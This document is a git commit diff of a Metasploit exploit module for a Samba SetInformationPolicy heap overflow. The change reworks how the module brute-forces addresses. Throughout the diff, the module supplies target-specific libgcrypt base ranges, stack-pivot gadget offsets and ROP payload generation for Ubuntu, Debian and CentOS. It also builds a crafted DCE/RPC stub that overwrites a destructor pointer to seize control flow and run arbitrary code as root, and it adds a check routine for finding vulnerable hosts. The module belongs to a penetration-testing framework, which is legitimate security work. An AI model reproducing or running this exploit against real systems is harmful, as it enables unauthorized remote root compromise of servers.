back to the original Brute mixin

jvazquez-r7 · jvazquez-r7 · commit 35b3bf4aa531 · 2012-11-19T14:13:49.000+01:00
diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::DCERPC
 	include Msf::Exploit::Remote::SMB
 	include Msf::Exploit::RopDb
+	include Msf::Exploit::Brute
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -25,10 +26,11 @@ def initialize(info = {})
 				call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to
 				trigger a heap overflow and finally execute arbitrary code with root privileges.
 
-				The module uses brute force to guess the system() address and redirect flow there
-				in order to bypass NX. The start and stop addresses for brute forcing have been
-				calculated empirically. On the other hand the module provides the StartBrute and
-				StopBrute which allow the user to configure his own addresses.
+				The module uses brute force to guess the stackpivot/rop chain or the system()
+				address and redirect flow there in order to bypass NX. The start and stop addresses
+				for brute forcing have been calculated empirically. On the other hand the module
+				provides the StartBrute and StopBrute which allow the user to configure his own
+				addresses.
 			},
 			'Author'         =>
 				[
@@ -57,29 +59,35 @@ def initialize(info = {})
 			'DefaultOptions' => { "PrependSetreuid" => true, "PrependSetregid" => true, "PrependFork" => true, "AppendExit" => true, "WfsDelay" => 5},
 			'Targets'        =>
 				[
-					['2:3.5.11~dfsg-1ubuntu2 on Ubuntu 11.10',
+					['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',
 						{
 							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
 							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-							'Start' => 0xb67f1000 ,
-							'Stop'  => 0xb69ef000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0xb67f1000 },
+									'Stop'  => { 'libgcrypt_base' => 0xb69ef000 },
+									'Step'  => 0x1000
+								}
 						}
 					],
-					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',
+					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',
 						{
 							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
 							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-							'Start' => 0xb68d9000 ,
-							'Stop'  => 0xb6ad7000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0xb68d9000 },
+									'Stop'  => { 'libgcrypt_base' => 0xb6ad7000 },
+									'Step'  => 0x1000
+								}
 						}
 					],
-					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.04',
+					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',
 						{
 							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
@@ -89,9 +97,12 @@ def initialize(info = {})
 							# we jump on "pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget
 							# to effectively stack pivot
 							'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;
-							'Start' => 0xb6973000 ,
-							'Stop'  => 0xb6b71000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0xb6973000 },
+									'Stop'  => { 'libgcrypt_base' => 0xb6b71000 },
+									'Step'  => 0x1000
+								}
 						}
 					],
 					# default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date
@@ -110,15 +121,18 @@ def initialize(info = {})
 					#		}
 					#	}
 					#],
-					['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',
+					['2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10',
 						{
 							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',
 							'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
-							'Start' => 0xb694f000 ,
-							'Stop'  => 0xb6b4d000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0xb694f000 },
+									'Stop'  => { 'libgcrypt_base' => 0xb6b4d000 },
+									'Step'  => 0x1000
+								}
 						}
 					],
 					['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
@@ -127,9 +141,12 @@ def initialize(info = {})
 							'Offset' => 0x11c0,
 							'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',
 							'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
-							'Start' => 0xb6962000 ,
-							'Stop'  => 0xb6a61000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0xb6962000 },
+									'Stop'  => { 'libgcrypt_base' => 0xb6a61000 },
+									'Step'  => 0x1000
+								}
 						}
 					],
 					['3.5.10-0.107.el5 on CentOS 5',
@@ -138,9 +155,12 @@ def initialize(info = {})
 							'Offset' => 0x11c0,
 							'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
 							'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
-							'Start' => 0x0037c000 ,
-							'Stop'  => 0x09e73000 ,
-							'Step'  => 0x1000,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libgcrypt_base' => 0x0037c000 },
+									'Stop'  => { 'libgcrypt_base' => 0x09e73000 },
+									'Step'  => 0x1000
+								}
 						}
 					]
 
@@ -151,78 +171,32 @@ def initialize(info = {})
 
 		register_options([
 			OptInt.new("StartBrute", [ false, "Start Address For Brute Forcing" ]),
-			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ]),
-			OptInt.new("Delay", [false,  "This option sets the delay in ms between each thread", 750])
+			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ])
 		], self.class)
 
 	end
 
 	def exploit
-		start = target["Start"]
-		stop = target["Stop"]
-		step = target["Step"]
-		delay = datastore["Delay"] || 750
+		if target.bruteforce?
+			bf = target.bruteforce
 
-		start = datastore["StartBrute"] if (datastore["StartBrute"] and datastore["StartBrute"] > 0 )
-		stop  = datastore["StopBrute"] if (datastore["StopBrute"] and datastore["StopBrute"] > 0 )
-
-		if start > stop
-			raise ArgumentError, "StartBrute should not be larger than StopBrute"
-		end
-
-		curr_addr = start
-		i = 0
-		count = (stop-start)/step
-
-		while curr_addr <= stop and not session_created?
-			t = []
-			1.upto(20) do
-				break if session_created?
-				i += 1
-				t << framework.threads.spawn("Module(#{self.refname})-#{curr_addr}",false, curr_addr, i, count) do |addr, i, count|
-					begin
-						ok = false
-						while ok != true
-							begin
-								do_one(addr, i, count)
-								ok = true
-							rescue ::Exception => e
-								print_status("The following  error was encountered: #{e.class} #{e}, retrying with same address")
-							end
-						end
-					end
-				end
-				curr_addr += step
-				break if curr_addr > stop
-				select(nil, nil, nil, delay/1000.0)
+			if datastore['StartBrute'] and datastore['StartBrute'] > 0
+				bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']
 			end
-			t.each {|x| x.join}
-		end
-	end
-
-	def check
-		begin
-			connect()
-			smb_login()
-			disconnect()
 
-			version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
-			minor   = version.scan(/\.(\d*)$/).flatten[0].to_i
-			print_status("Version found: #{version}")
-
-			return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
-			return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
-			return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
-
-			return Exploit::CheckCode::Safe
+			if datastore['StopBrute'] and datastore['StopBrute'] > 0
+				bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']
+			end
 
-		rescue ::Exception
-			return CheckCode::Unknown
+			if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']
+				raise ArgumentError, "StartBrute should not be larger than StopBrute"
+			end
 		end
+		super
 	end
 
-	def do_one(addr, i, count)
-		print_status("Trying to exploit Samba with address 0x%.8x (%i/%i)..." % [addr, i, count])
+	def brute_exploit(target_addrs)
+		print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['libgcrypt_base'])
 		datastore['DCERPC::fake_bind_multi'] = false
 		datastore['DCERPC::max_frag_size'] = 4248
 		datastore['DCERPC::smb_pipeio'] = 'trans'
@@ -248,13 +222,13 @@ def do_one(addr, i, count)
 			tmp << "\x00"*(816-tmp.length)
 			ret_addr =  addr
 		elsif target['Arch'] == ARCH_X86
-			cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> addr })
+			cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libgcrypt_base'] })
 			tmp = cmd
 			tmp << "\x00"*(816-tmp.length)
-			ret_addr = addr+target['Stackpivot']
+			ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']
 			# will help in stack pivot when it's not eax pointing to shellcode
 			if target['Stackpivot_helper']
-				helper = addr+target['Stackpivot_helper']
+				helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']
 			end
 		end
 
@@ -274,7 +248,7 @@ def do_one(addr, i, count)
 		stub << NDR.long(helper) + 'A'*4        # next, prev
 		stub << NDR.long(0) + NDR.long(0)     # parent, child
 		stub << NDR.long(0)                   # refs
-#		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
+		#		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
 		stub << NDR.long(ret_addr) # destructor # will become EIP
 		stub << NDR.long(0)                   # name
 		stub << "AAAA"                        # size
@@ -302,6 +276,27 @@ def do_one(addr, i, count)
 		disconnect()
 	end
 
+	def check
+		begin
+			connect()
+			smb_login()
+			disconnect()
+
+			version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
+			minor   = version.scan(/\.(\d*)$/).flatten[0].to_i
+			print_status("Version found: #{version}")
+
+			return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
+			return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
+			return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
+
+			return Exploit::CheckCode::Safe
+
+		rescue ::Exception
+			return CheckCode::Unknown
+		end
+	end
+
 	# Perform a DCE/RPC Function Call
 	def call(dcerpc, function, data, do_recv = true)
 
